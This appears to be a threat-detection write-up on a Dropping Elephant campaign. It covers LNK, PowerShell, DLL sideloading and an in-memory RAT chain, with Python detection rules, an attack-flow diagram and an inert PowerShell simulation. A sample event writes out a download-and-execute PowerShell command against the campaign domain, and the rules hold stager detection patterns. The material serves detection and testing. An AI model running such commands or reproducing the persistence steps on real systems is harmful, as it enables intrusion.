Malware à la Mode: Inside Dropping Elephant’s Loader Chain
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
A sophisticated campaign attributed to Dropping Elephant uses China-themed decoy documents to deliver an updated, memory-resident remote access trojan. The intrusion relies on DLL sideloading through a legitimate Microsoft binary and the Donut shellcode loader to avoid disk-based detection. The final payload also uses advanced evasion methods, including control-flow flattening and runtime API reconstruction.
Investigation
Rapid7 researchers uncovered the threat during a proactive hunt that began with a malicious Windows shortcut masquerading as a PDF document. Their investigation followed the payload chain from initial staging on chinagreenenergy[.]org through DLL sideloading of APPWIZ.cpl to execution of an in-memory RAT. Code-level analysis with Diaphora confirmed a common lineage with earlier Dropping Elephant samples despite extensive reworking.
Mitigation
Defenders should prioritize behavioral detections: shortcut files that spawn PowerShell, payload staging in C:\Users\Public, scheduled tasks with unusual or vendor-sounding names, and DLL sideloading from directories where the legitimate library never lives. Because the final payload runs only in memory, endpoint defenses also need memory-level visibility to catch tampering with AMSI, WLDP, and ETW.
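The four behavioral detections above, written out as rules over constructed Sysmon-style events. This is an added example, not Rapid7's or the page's own detection code; the field names follow Sysmon (Image, ParentImage, CommandLine, TargetFilename, ImageLoaded) and Security event 4698 (TaskName), the sample events are constructed to mirror the chain described on this page plus three benign look-alikes, and the sideload target list, trusted-directory list and stager flag patterns are assumptions for illustration.

```python
"""Behavioral rules from the Mitigation section, applied to constructed
Sysmon-style events. Added example; not the page's or Rapid7's code."""
import re

PUBLIC_DIR = "c:\\users\\public\\"
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
TRUSTED_DIRS = SYSTEM_DIRS + ("c:\\program files\\", "c:\\program files (x86)\\")
USER_WRITABLE = (PUBLIC_DIR, "\\appdata\\", "\\temp\\", "\\programdata\\")
# Libraries the campaign side-loads; legitimate copies live only in SYSTEM_DIRS (assumed list).
SIDELOAD_TARGETS = {"appwiz.cpl", "vcruntime140.dll"}
# Launcher flags and download primitives typical of LNK-spawned PowerShell stagers (assumed).
PS_STAGER = re.compile(
    r"-(?:windowstyle\s+hidden|executionpolicy\s+bypass|enc(?:odedcommand)?\b)"
    r"|downloadstring|downloadfile|\biex\b|invoke-expression", re.I)
VENDOR_LOOKALIKE = re.compile(r"^\\?(?:google|microsoft|adobe)\w*", re.I)


def detect(event: dict) -> list[str]:
    """Return the names of the behavioral rules this one event trips."""
    hits = []
    kind = event["type"]
    if kind == "process_creation":
        image = event["Image"].lower()
        parent = event["ParentImage"].lower()
        cmd = event["CommandLine"]
        # PowerShell spawned via conhost.exe (or directly by explorer.exe, as an LNK
        # does) with hidden-window / download indicators in its arguments.
        if (image.endswith("\\powershell.exe")
                and parent.endswith(("\\conhost.exe", "\\explorer.exe"))
                and PS_STAGER.search(cmd)):
            hits.append("shortcut_powershell")
        if image.startswith(PUBLIC_DIR) or PUBLIC_DIR in cmd.lower():
            hits.append("public_execution")
    elif kind == "file_event":
        target = event["TargetFilename"].lower()
        if target.startswith(PUBLIC_DIR) and target.endswith((".exe", ".dll", ".cpl", ".lnk")):
            hits.append("public_staging")
    elif kind == "image_load":
        loaded = event["ImageLoaded"].lower()
        # A known side-load target loaded from anywhere but the system directories.
        if loaded.rsplit("\\", 1)[-1] in SIDELOAD_TARGETS and not loaded.startswith(SYSTEM_DIRS):
            hits.append("dll_sideload")
    elif kind == "scheduled_task":
        name = event["TaskName"]
        cmd = event["Command"].lower()
        from_writable = any(marker in cmd for marker in USER_WRITABLE)
        # Vendor-sounding task name whose action does not live in a vendor directory.
        lookalike = bool(VENDOR_LOOKALIKE.match(name)) and not cmd.startswith(TRUSTED_DIRS)
        if from_writable or lookalike:
            hits.append("suspicious_task")
    return hits


# Constructed events: the first four mirror the chain on this page, the last
# three are benign look-alikes the rules must leave alone.
EVENTS = [
    {"type": "process_creation",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\System32\\conhost.exe",
     "CommandLine": "PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden "
                    "-Command IEX (New-Object Net.WebClient).DownloadString('https://chinagreenenergy[.]org/')"},
    {"type": "file_event", "TargetFilename": "C:\\Users\\Public\\APPWIZ.cpl"},
    {"type": "image_load", "Image": "C:\\Users\\Public\\Fondue.exe",
     "ImageLoaded": "C:\\Users\\Public\\APPWIZ.cpl"},
    {"type": "scheduled_task", "TaskName": "\\GoogleErrorReport",
     "Command": "C:\\Users\\Public\\Fondue.exe"},
    {"type": "process_creation",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell.exe"},
    {"type": "image_load", "Image": "C:\\Windows\\System32\\rundll32.exe",
     "ImageLoaded": "C:\\Windows\\System32\\appwiz.cpl"},
    {"type": "scheduled_task", "TaskName": "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag",
     "Command": "C:\\Windows\\System32\\defrag.exe"},
]


def run(events: list[dict]) -> list[list[str]]:
    """Evaluate every event; the i-th result lists the rules event i tripped."""
    return [detect(e) for e in events]


if __name__ == "__main__":
    for event, hits in zip(EVENTS, run(EVENTS)):
        print(f"{event['type']:17} {hits or '-'}")
```

The rules deliberately key on where a binary runs from rather than on file names, so renaming Fondue.exe or the task does not evade them; the one name-based check (vendor look-alike task names) is only an alarm when the action also lives outside a vendor directory, which keeps Microsoft's own maintenance tasks quiet.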
Response
If this activity is detected, isolate affected systems immediately to disrupt further command-and-control traffic. Perform memory forensics to identify the injected RAT and inspect scheduled tasks for persistence. Network logs should also be reviewed for unauthorized HTTPS traffic to the known C2 domains and for any signs of file exfiltration.
Attack Flow

```mermaid
graph TB
    %% Class Definitions Section
    classDef action fill:#99ccff
    classDef tool fill:#cccccc
    classDef malware fill:#ff9999
    classDef process fill:#ccffcc
    classDef network fill:#ffff99

    %% Node Definitions
    %% Initial Access and Execution
    action_user_exec["<b>Action</b> – <b>T1204.002 User Execution: Malicious File</b><br/>Victim executes malicious shortcut file<br/><b>File</b>: GRES3001.lnk<br/><b>Disguise</b>: PDF icon"]
    class action_user_exec action
    action_icon_smuggling["<b>Action</b> – <b>T1027.012 Obfuscated Files or Information: LNK Icon Smuggling</b><br/>Deceives user via icon manipulation<br/><b>Method</b>: LNK file icon spoofing"]
    class action_icon_smuggling action

    %% Downloader Phase
    process_conhost["<b>Process</b> – <b>conhost.exe</b><br/>Host process for console windows<br/><b>Role</b>: Initiates PowerShell downloader"]
    class process_conhost process
    action_binary_padding["<b>Action</b> – <b>T1027.001 Obfuscated Files or Information: Binary Padding</b><br/>Uses string-splitting obfuscation<br/><b>Target</b>: PowerShell downloader script"]
    class action_binary_padding action
    tool_downloader["<b>Tool</b> – <b>PowerShell Downloader</b><br/>Retrieves decoy and malicious payloads<br/><b>Source</b>: chinagreenenergy[.]org"]
    class tool_downloader tool

    %% Post-Download and Persistence
    action_masquerading["<b>Action</b> – <b>T1036.008 Masquerading: Masquerade File Type</b><br/>Renames files to look legitimate<br/><b>Directory</b>: C:\Users\Public\"]
    class action_masquerading action
    action_persistence["<b>Action</b> – <b>T1546 Event Triggered Execution</b><br/>Ensures persistence via scheduled task<br/><b>Task Name</b>: GoogleErrorReport<br/><b>Interval</b>: Every minute"]
    class action_persistence action

    %% Execution Chain and Side-loading
    action_proxy_exec["<b>Action</b> – <b>T1218.002 System Binary Proxy Execution: Control Panel</b><br/>Uses legitimate binary to execute loader<br/><b>Binary</b>: Fondue.exe"]
    class action_proxy_exec action
    tool_loader_cpl["<b>Tool</b> – <b>APPWIZ.cpl</b><br/>Malicious Control Panel loader<br/><b>Method</b>: DLL Side-loading"]
    class tool_loader_cpl tool
    action_reflective_load["<b>Action</b> – <b>T1620 Reflective Code Loading</b><br/>Maps code directly into memory<br/><b>Loader</b>: Donut shellcode loader"]
    class action_reflective_load action

    %% Post-Exploitation and C2
    malware_rat["<b>Malware</b> – <b>RAT</b><br/>Remote Access Trojan<br/><b>Status</b>: Resident in memory"]
    class malware_rat malware
    action_gather_info["<b>Action</b> – <b>T1592 Gather Victim Host Information</b><br/>Collects system metadata<br/><b>Data</b>: Username, computer name, OS, IP"]
    class action_gather_info action
    action_c2["<b>Action</b> – <b>TA0011 Command and Control</b><br/>Maintains communication via HTTPS<br/><b>Domain</b>: gcl-power[.]org"]
    class action_c2 action
    action_exfiltration["<b>Action</b> – <b>Screen Capture and Exfiltration</b><br/>T1113 Screen Capture<br/><b>Goal</b>: Data theft"]
    class action_exfiltration action

    %% Connection Flow
    action_user_exec -->|leads_to| action_icon_smuggling
    action_icon_smuggling -->|triggers| process_conhost
    process_conhost -->|uses| action_binary_padding
    action_binary_padding -->|executes| tool_downloader
    tool_downloader -->|downloads_to| action_masquerading
    action_masquerading -->|sets_up| action_persistence
    action_persistence -->|triggers| action_proxy_exec
    action_proxy_exec -->|loads| tool_loader_cpl
    tool_loader_cpl -->|utilizes| action_reflective_load
    action_reflective_load -->|installs| malware_rat
    malware_rat -->|performs| action_gather_info
    malware_rat -->|establishes| action_c2
    action_c2 -->|facilitates| action_exfiltration
```
Detections
- Possible IP Lookup Domain Communications Attempted (via dns)
- Unusual Change Code Page Execution (via cmdline)
- Suspicious Scheduled Task (via audit)
- Suspicious Execution from Public User Profile (via process_creation)
- Vcruntime140 Dynamic Library Loaded From Suspicious Directory (via image_load)
- Suspicious Files in Public User Profile (via file_event)
- Detection of Dropping Elephant's Malware Campaign [Windows Network Connection]
- Malicious DLL Side-Loading via Fondue.exe [Windows File Event]
- Dropping Elephant Malware Campaign Detection via Shortcut and Side-Loading [Windows Process Creation]
Simulation Execution
Prerequisite: the Telemetry & Baseline Pre-flight Check must have passed.
Rationale: this section reproduces the adversary's TTPs closely enough to generate the telemetry the detection rules key on. The commands and narrative below mirror the TTPs in the attack flow rather than the real malware, and aim to produce the exact events the detection logic expects.
Attack Narrative & Commands: The adversary aims to establish persistence and execute a downloader. To get past email filters, they deliver a shortcut file named GRES3001.lnk that carries a PDF icon. When clicked, it invokes conhost.exe to run a PowerShell script. At the same time, they establish persistence by creating a scheduled task named GoogleErrorReport that runs Fondue.exe from a public directory, the name masquerading as a legitimate Google error reporter to evade casual inspection.
Regression Test Script:

```powershell
# 1. Simulate the shortcut -> conhost.exe -> PowerShell chain.
# The real LNK launches a PowerShell downloader. Here PowerShell only echoes a
# marker, so nothing is fetched from the network, but the command line still
# carries the launcher flags (-ExecutionPolicy Bypass, -WindowStyle Hidden) and
# the 'GRES3001.lnk' string that the process_creation rule looks for.
# Note: the real parent is the shortcut launched by explorer.exe; a script cannot
# spoof its own parent, so only the conhost.exe -> PowerShell hop is reproduced.
Write-Host "[!] Simulating GRES3001.lnk trigger..."
$PsArgs = "PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command `"Write-Host 'GRES3001.lnk simulated downloader'`""
Start-Process -FilePath "conhost.exe" -ArgumentList $PsArgs -Wait

# 2. Stage a dummy Fondue.exe in the public profile and register the task.
# Requires an elevated session, since the task principal is SYSTEM.
Write-Host "[!] Simulating GoogleErrorReport scheduled task..."
$Payload = "C:\Users\Public\Fondue.exe"
New-Item -Path $Payload -ItemType File -Force | Out-Null
Set-Content -Path $Payload -Value "Dummy Payload"   # inert text, not a PE; any launch attempt simply fails
$TaskName = "GoogleErrorReport"
$Action   = New-ScheduledTaskAction -Execute $Payload
# The campaign's task fires every minute; a repeating trigger reproduces that telemetry.
$Trigger  = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 1) -RepetitionDuration (New-TimeSpan -Hours 1)
Register-ScheduledTask -TaskName $TaskName -Action $Action -Trigger $Trigger -Description "Simulated Dropping Elephant Task" -User "SYSTEM" -Force | Out-Null
Write-Host "[+] Simulation Complete. Check SIEM for alerts."
```
Cleanup Commands:

```powershell
# Remove the dummy malware binary
Remove-Item -Path "C:\Users\Public\Fondue.exe" -Force -ErrorAction SilentlyContinue
# Remove the simulated scheduled task
Unregister-ScheduledTask -TaskName "GoogleErrorReport" -Confirm:$false
Write-Host "[+] Cleanup Complete."
```